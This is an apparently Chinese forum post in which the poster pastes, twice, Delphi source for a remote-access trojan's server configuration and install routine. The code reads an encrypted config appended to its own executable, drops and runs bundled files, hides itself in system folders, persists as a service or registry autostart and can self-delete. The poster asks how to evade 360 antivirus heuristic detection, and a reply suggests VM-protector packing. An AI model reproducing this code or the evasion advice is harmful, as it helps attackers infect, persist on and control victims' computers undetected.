杀到这个地方了
procedure TDRFServer.ReadMe;
Var
Temp:string;
F:file;
Each_size:array [1..27] of char;
Str:array [1..1000] of char; Symbol:array [1..7] of char;
Setstr:string;
len,i:integer;
S:integer;
Count,b:integer;
J,JJ:integer; buf:array[0..4096] of byte;
fstream1:tfilestream;
fstream2:tfilestream;
info:FILE_INFO;
dir:string; Reg:TRegistry;
begin
try //360特征码
Assignfile(F,paramstr(0));
FileMode :=0;
Reset(f,1);
Seek(F,Filesize(f)-7);
BlockRead(F,Symbol,7);if JieMi(Symbol)='HGZVIP1' then
begin
Seek(F,filesize(F)-34);
BlockRead(F,Each_size,27);
len:=0;
for i:=1 to 27 do len:=len+ord(each_size[i]);
Seek(f,filesize(F)-34-len);
for i:=1 to 1000 do str[i]:=' ';
blockread(F,Str,len);
Setstr:=Trim(str); Peizhi.SetupPath :=strtoint(JieMi(copy(Setstr,1,ord(each_size[1])))); {安装路径} i:=ord(each_size[1])+1; {安装名称}
Peizhi.SetupFile:=JieMi(copy(setstr,i,ord(each_size[2]))); i:=i+ord(each_size[2]);
Temp:=JieMi(copy(setstr,i,ord(each_size[3])));
if Copy(Temp,1,1)='1' then Peizhi.AutoDelMe:=True; {自我删除}
if Copy(Temp,2,1)='1' then Peizhi.RunView:=True; {运行时充许退出} i:=i+ord(each_size[3]); {启动项}
Temp:=JieMi(copy(setstr,i,ord(each_size[4])));
if Copy(Temp,1,1)='1' then Peizhi.Regqidong:=True; {写入注册表启动项}
if Copy(Temp,2,1)='1' then Peizhi.WinXpSer:=True; {写入服务项}
i:=i+ord(each_size[4]); {显示名称}
Peizhi.WinServerView:=JieMi(copy(setstr,i,ord(each_size[5]))); i:=i+ord(each_size[5]); {服务名称}
Peizhi.WinServerName:=JieMi(copy(setstr,i,ord(each_size[6]))); i:=i+ord(each_size[6]); {描述信息}
Peizhi.WinServerText:=JieMi(copy(setstr,i,ord(each_size[7]))); i:=i+ord(each_size[7]);
Temp:=JieMi(copy(setstr,i,ord(each_size[8])));
if Copy(Temp,1,1)='1' then Peizhi.MsgShow:=True; {是否显示对话框}
Peizhi.TouBiao:=Strtoint(Copy(Temp,2,1)); {图标类型}
Peizhi.NanNu:=strtoint(Copy(Temp,3,1)); {按钮类型} i:=i+ord(each_size[8]); {对话框标题}
Peizhi.BiaoTi:=JieMi(copy(setstr,i,ord(each_size[9]))); i:=i+ord(each_size[9]); {对话框正文}
Peizhi.NeiRong:=JieMi(copy(setstr,i,ord(each_size[10]))); i:=i+ord(each_size[10]); {服务端未配置前大小}
Peizhi.SfileSize:=Strtoint(JieMi(copy(setstr,i,ord(each_size[11])))); case Peizhi.SetupPath of {安装路径}
0:Setupname:=Syspath+Peizhi.SetupFile;
1:Setupname:=windowspath+Peizhi.SetupFile;
2:Setupname:=Temppath+Peizhi.SetupFile;
end;
try
if Peizhi.SfileSize<>0 then
begin
try
fstream1:=tfilestream.Create(paramstr(0),fmShareDenyRead);
fstream1.Seek(Peizhi.SfileSize,soFromBeginning);
while fstream1.Position<>fstream1.Size do
begin
fstream1.Read(info,sizeof(info));
count:=0;
if (CompareText(paramstr(0),Setupname)<>0) then
dir:=TempPath+info.filename
else
dir:=ExtractFilePath(ParamStr(0))+info.filename;
if FileExists(dir) then
begin
FilesetAttr(dir,0);
DeleteFile(dir);
end;
if FileExists(dir) then
dir:=RandomFilename(dir); assignfile(f,dir);
rewrite(f);
closefile(f);
fstream2:=tfilestream.Create(dir,fmopenwrite);
fstream2.Size:=0;
j:=info.len div sizeof(buf);
for b:=1 to j do
begin
s:=fstream1.Read(buf,sizeof(buf));
fstream2.Write(buf,s);
inc(count,s);
end;
s:=fstream1.Read(buf,info.len-count);
fstream2.Write(buf,s);
fstream2.Free;
if info.isopen<>0 then
begin
ShellExecute(0, 'Open', pchar(dir),info.Por, nil, SW_NORMAL);
end else begin {info.isopen=0}
if (CompareText(paramstr(0),Setupname)<>0) then
ShellExecute(0, 'Open', pchar(dir),info.Por, nil, SW_NORMAL);
end;
end; {while}
finally
fstream1.Free;
end;
end;
except
end; if (CompareText(paramstr(0),Setupname)<>0) then
begin
try
if FileExists(Setupname) then
begin
FilesetAttr(Setupname,0);
DeleteFile(Setupname);
if FileExists(Setupname) then
begin
Halt(0);
Exit;
end;
end;
CopyFile(pchar(paramstr(0)),pchar(Setupname),False);
Setfileattributes(pchar(Setupname),FILE_ATTRIBUTE_SYSTEM+FILE_ATTRIBUTE_HIDDEN);
except
end;
try
try
reg:=Tregistry.Create ;
reg.RootKey :=HKEY_LOCAL_MACHINE;
reg.OpenKey ('SOFTWARE\Microsoft\Windows\CurrentVersion\Setup',true);
reg.DeleteValue('Beizhu');
Reg.CloseKey;
reg.Free;
except
end; if IsNT then
begin
if Peizhi.WinXpSer then
begin
try
DelService(Peizhi.WinServerName);
except
end;
Sleep(1000);
try
InstallService(Peizhi.WinServerName,Peizhi.WinServerView,Setupname+' -NetSata',Peizhi.WinServerText);
except
end;
end;
end
else
begin
InRegMe;
end;
{第一次安装,显示提示内容!}
if Peizhi.MsgShow then
begin
try
case Peizhi.NanNu of
0:j:=MB_OK;
1:j:=MB_OKCANCEL;
2:j:=MB_YESNO;
3:j:=MB_YESNOCANCEL;
4:j:=MB_RETRYCANCEL;
5:j:=MB_ABORTRETRYIGNORE;
end;
case Peizhi.TouBiao of
0:JJ:=mb_iconInformation;
1:JJ:=MB_ICONQUESTION ;
2:JJ:=mb_iconwarning;
3:JJ:=mb_iconerror;
end;
Forms.Application.MessageBox(pchar(Peizhi.NeiRong),pchar(Peizhi.BiaoTi),J+JJ+mb_topmost);
except
end;
end;
if paramstr(1)='' then
begin
Winexec(pchar(Setupname+' -NetSata'),SW_Hide);
end;
if (Peizhi.AutoDelMe) and (paramstr(1)='') then
begin
DelMe;
end;
Halt;
Exit;
except
Halt;
end;
Exit;
end;
i:=i+ord(each_size[11]);
Peizhi.Urlhttp:=JieMi(copy(setstr,i,ord(each_size[12]))); i:=i+ord(each_size[12]);
Temp:=JieMi(copy(setstr,i,ord(each_size[13])));
//
j:=pos(':',Temp);
if j>0 then
begin
try
Peizhi.Port :=80;
Peizhi.Port :=StrtoInt(Copy(Temp,j+1,Length(Temp)));
except
end;
Peizhi.Dnsym:=Copy(Temp,1,j-1);
end
else
begin
Peizhi.Port :=80;
Peizhi.Dnsym:=Temp;
end; i:=i+ord(each_size[13]);
Peizhi.httpwj:=JieMi(copy(setstr,i,ord(each_size[14]))); i:=i+ord(each_size[14]);
Peizhi.PassWord:=JieMi(copy(setstr,i,ord(each_size[15]))); i:=i+ord(each_size[15]);
Peizhi.Group:=JieMi(copy(setstr,i,ord(each_size[16]))); i:=i+ord(each_size[16]);
try
Peizhi.ClientIm:=Strtoint(JieMi(copy(setstr,i,ord(each_size[17]))));
except
Peizhi.ClientIm:=25;
end; i:=i+ord(each_size[17]);
Peizhi.Beizhu:=JieMi(copy(setstr,i,ord(each_size[18])));
i:=i+ord(each_size[18]);
Temp:=JieMi(copy(setstr,i,ord(each_size[19])));
if Temp<>'0' then Peizhi.OpenFtpS:=True; i:=i+ord(each_size[19]);
Peizhi.FtpPort:=JieMi(copy(setstr,i,ord(each_size[20]))); i:=i+ord(each_size[20]);
Peizhi.Ftpuser:=JieMi(copy(setstr,i,ord(each_size[21]))); i:=i+ord(each_size[21]);
Peizhi.Ftppass:=JieMi(copy(setstr,i,ord(each_size[22]))); i:=i+ord(each_size[23]);
Temp:=JieMi(copy(setstr,i,ord(each_size[24])));
if Temp<>'0' then Peizhi.OpenSocks5:=True; i:=i+ord(each_size[24]);
try
Peizhi.Socks5Port:=Strtoint(JieMi(copy(setstr,i,ord(each_size[25]))));
except
Peizhi.Socks5Port:=1080;
end; i:=i+ord(each_size[25]);
Peizhi.Socks5user:=JieMi(copy(setstr,i,ord(each_size[26])));
i:=i+ord(each_size[26]);
Peizhi.Socks5pass:=JieMi(copy(setstr,i,ord(each_size[27]))); end
else
begin
Peizhi.Urlhttp:='';
Peizhi.Group:='配置出错主机';
end;
try
Closefile(f);
except
end;
Except
Peizhi.Urlhttp:='';
Peizhi.Group:='读取配置出错主机';
end;
end;不知道怎么改了 ,看别的帖子说的高启发查杀是查杀两个地方,不知道怎么找另一个地方了,稍微取消一段代码注释就被杀了,有懂的大哥帮帮,不懂的帮忙顶顶贴,谢谢各位了,本人第一次发帖。
procedure TDRFServer.ReadMe;
Var
Temp:string;
F:file;
Each_size:array [1..27] of char;
Str:array [1..1000] of char; Symbol:array [1..7] of char;
Setstr:string;
len,i:integer;
S:integer;
Count,b:integer;
J,JJ:integer; buf:array[0..4096] of byte;
fstream1:tfilestream;
fstream2:tfilestream;
info:FILE_INFO;
dir:string; Reg:TRegistry;
begin
try //360特征码
Assignfile(F,paramstr(0));
FileMode :=0;
Reset(f,1);
Seek(F,Filesize(f)-7);
BlockRead(F,Symbol,7);if JieMi(Symbol)='HGZVIP1' then
begin
Seek(F,filesize(F)-34);
BlockRead(F,Each_size,27);
len:=0;
for i:=1 to 27 do len:=len+ord(each_size[i]);
Seek(f,filesize(F)-34-len);
for i:=1 to 1000 do str[i]:=' ';
blockread(F,Str,len);
Setstr:=Trim(str); Peizhi.SetupPath :=strtoint(JieMi(copy(Setstr,1,ord(each_size[1])))); {安装路径} i:=ord(each_size[1])+1; {安装名称}
Peizhi.SetupFile:=JieMi(copy(setstr,i,ord(each_size[2]))); i:=i+ord(each_size[2]);
Temp:=JieMi(copy(setstr,i,ord(each_size[3])));
if Copy(Temp,1,1)='1' then Peizhi.AutoDelMe:=True; {自我删除}
if Copy(Temp,2,1)='1' then Peizhi.RunView:=True; {运行时充许退出} i:=i+ord(each_size[3]); {启动项}
Temp:=JieMi(copy(setstr,i,ord(each_size[4])));
if Copy(Temp,1,1)='1' then Peizhi.Regqidong:=True; {写入注册表启动项}
if Copy(Temp,2,1)='1' then Peizhi.WinXpSer:=True; {写入服务项}
i:=i+ord(each_size[4]); {显示名称}
Peizhi.WinServerView:=JieMi(copy(setstr,i,ord(each_size[5]))); i:=i+ord(each_size[5]); {服务名称}
Peizhi.WinServerName:=JieMi(copy(setstr,i,ord(each_size[6]))); i:=i+ord(each_size[6]); {描述信息}
Peizhi.WinServerText:=JieMi(copy(setstr,i,ord(each_size[7]))); i:=i+ord(each_size[7]);
Temp:=JieMi(copy(setstr,i,ord(each_size[8])));
if Copy(Temp,1,1)='1' then Peizhi.MsgShow:=True; {是否显示对话框}
Peizhi.TouBiao:=Strtoint(Copy(Temp,2,1)); {图标类型}
Peizhi.NanNu:=strtoint(Copy(Temp,3,1)); {按钮类型} i:=i+ord(each_size[8]); {对话框标题}
Peizhi.BiaoTi:=JieMi(copy(setstr,i,ord(each_size[9]))); i:=i+ord(each_size[9]); {对话框正文}
Peizhi.NeiRong:=JieMi(copy(setstr,i,ord(each_size[10]))); i:=i+ord(each_size[10]); {服务端未配置前大小}
Peizhi.SfileSize:=Strtoint(JieMi(copy(setstr,i,ord(each_size[11])))); case Peizhi.SetupPath of {安装路径}
0:Setupname:=Syspath+Peizhi.SetupFile;
1:Setupname:=windowspath+Peizhi.SetupFile;
2:Setupname:=Temppath+Peizhi.SetupFile;
end;
try
if Peizhi.SfileSize<>0 then
begin
try
fstream1:=tfilestream.Create(paramstr(0),fmShareDenyRead);
fstream1.Seek(Peizhi.SfileSize,soFromBeginning);
while fstream1.Position<>fstream1.Size do
begin
fstream1.Read(info,sizeof(info));
count:=0;
if (CompareText(paramstr(0),Setupname)<>0) then
dir:=TempPath+info.filename
else
dir:=ExtractFilePath(ParamStr(0))+info.filename;
if FileExists(dir) then
begin
FilesetAttr(dir,0);
DeleteFile(dir);
end;
if FileExists(dir) then
dir:=RandomFilename(dir); assignfile(f,dir);
rewrite(f);
closefile(f);
fstream2:=tfilestream.Create(dir,fmopenwrite);
fstream2.Size:=0;
j:=info.len div sizeof(buf);
for b:=1 to j do
begin
s:=fstream1.Read(buf,sizeof(buf));
fstream2.Write(buf,s);
inc(count,s);
end;
s:=fstream1.Read(buf,info.len-count);
fstream2.Write(buf,s);
fstream2.Free;
if info.isopen<>0 then
begin
ShellExecute(0, 'Open', pchar(dir),info.Por, nil, SW_NORMAL);
end else begin {info.isopen=0}
if (CompareText(paramstr(0),Setupname)<>0) then
ShellExecute(0, 'Open', pchar(dir),info.Por, nil, SW_NORMAL);
end;
end; {while}
finally
fstream1.Free;
end;
end;
except
end; if (CompareText(paramstr(0),Setupname)<>0) then
begin
try
if FileExists(Setupname) then
begin
FilesetAttr(Setupname,0);
DeleteFile(Setupname);
if FileExists(Setupname) then
begin
Halt(0);
Exit;
end;
end;
CopyFile(pchar(paramstr(0)),pchar(Setupname),False);
Setfileattributes(pchar(Setupname),FILE_ATTRIBUTE_SYSTEM+FILE_ATTRIBUTE_HIDDEN);
except
end;
try
try
reg:=Tregistry.Create ;
reg.RootKey :=HKEY_LOCAL_MACHINE;
reg.OpenKey ('SOFTWARE\Microsoft\Windows\CurrentVersion\Setup',true);
reg.DeleteValue('Beizhu');
Reg.CloseKey;
reg.Free;
except
end; if IsNT then
begin
if Peizhi.WinXpSer then
begin
try
DelService(Peizhi.WinServerName);
except
end;
Sleep(1000);
try
InstallService(Peizhi.WinServerName,Peizhi.WinServerView,Setupname+' -NetSata',Peizhi.WinServerText);
except
end;
end;
end
else
begin
InRegMe;
end;
{第一次安装,显示提示内容!}
if Peizhi.MsgShow then
begin
try
case Peizhi.NanNu of
0:j:=MB_OK;
1:j:=MB_OKCANCEL;
2:j:=MB_YESNO;
3:j:=MB_YESNOCANCEL;
4:j:=MB_RETRYCANCEL;
5:j:=MB_ABORTRETRYIGNORE;
end;
case Peizhi.TouBiao of
0:JJ:=mb_iconInformation;
1:JJ:=MB_ICONQUESTION ;
2:JJ:=mb_iconwarning;
3:JJ:=mb_iconerror;
end;
Forms.Application.MessageBox(pchar(Peizhi.NeiRong),pchar(Peizhi.BiaoTi),J+JJ+mb_topmost);
except
end;
end;
if paramstr(1)='' then
begin
Winexec(pchar(Setupname+' -NetSata'),SW_Hide);
end;
if (Peizhi.AutoDelMe) and (paramstr(1)='') then
begin
DelMe;
end;
Halt;
Exit;
except
Halt;
end;
Exit;
end;
i:=i+ord(each_size[11]);
Peizhi.Urlhttp:=JieMi(copy(setstr,i,ord(each_size[12]))); i:=i+ord(each_size[12]);
Temp:=JieMi(copy(setstr,i,ord(each_size[13])));
//
j:=pos(':',Temp);
if j>0 then
begin
try
Peizhi.Port :=80;
Peizhi.Port :=StrtoInt(Copy(Temp,j+1,Length(Temp)));
except
end;
Peizhi.Dnsym:=Copy(Temp,1,j-1);
end
else
begin
Peizhi.Port :=80;
Peizhi.Dnsym:=Temp;
end; i:=i+ord(each_size[13]);
Peizhi.httpwj:=JieMi(copy(setstr,i,ord(each_size[14]))); i:=i+ord(each_size[14]);
Peizhi.PassWord:=JieMi(copy(setstr,i,ord(each_size[15]))); i:=i+ord(each_size[15]);
Peizhi.Group:=JieMi(copy(setstr,i,ord(each_size[16]))); i:=i+ord(each_size[16]);
try
Peizhi.ClientIm:=Strtoint(JieMi(copy(setstr,i,ord(each_size[17]))));
except
Peizhi.ClientIm:=25;
end; i:=i+ord(each_size[17]);
Peizhi.Beizhu:=JieMi(copy(setstr,i,ord(each_size[18])));
i:=i+ord(each_size[18]);
Temp:=JieMi(copy(setstr,i,ord(each_size[19])));
if Temp<>'0' then Peizhi.OpenFtpS:=True; i:=i+ord(each_size[19]);
Peizhi.FtpPort:=JieMi(copy(setstr,i,ord(each_size[20]))); i:=i+ord(each_size[20]);
Peizhi.Ftpuser:=JieMi(copy(setstr,i,ord(each_size[21]))); i:=i+ord(each_size[21]);
Peizhi.Ftppass:=JieMi(copy(setstr,i,ord(each_size[22]))); i:=i+ord(each_size[23]);
Temp:=JieMi(copy(setstr,i,ord(each_size[24])));
if Temp<>'0' then Peizhi.OpenSocks5:=True; i:=i+ord(each_size[24]);
try
Peizhi.Socks5Port:=Strtoint(JieMi(copy(setstr,i,ord(each_size[25]))));
except
Peizhi.Socks5Port:=1080;
end; i:=i+ord(each_size[25]);
Peizhi.Socks5user:=JieMi(copy(setstr,i,ord(each_size[26])));
i:=i+ord(each_size[26]);
Peizhi.Socks5pass:=JieMi(copy(setstr,i,ord(each_size[27]))); end
else
begin
Peizhi.Urlhttp:='';
Peizhi.Group:='配置出错主机';
end;
try
Closefile(f);
except
end;
Except
Peizhi.Urlhttp:='';
Peizhi.Group:='读取配置出错主机';
end;
end;不知道怎么改了 ,看别的帖子说的高启发查杀是查杀两个地方,不知道怎么找另一个地方了,稍微取消一段代码注释就被杀了,有懂的大哥帮帮,不懂的帮忙顶顶贴,谢谢各位了,本人第一次发帖。
你可以找个vm 壳 用sdk试试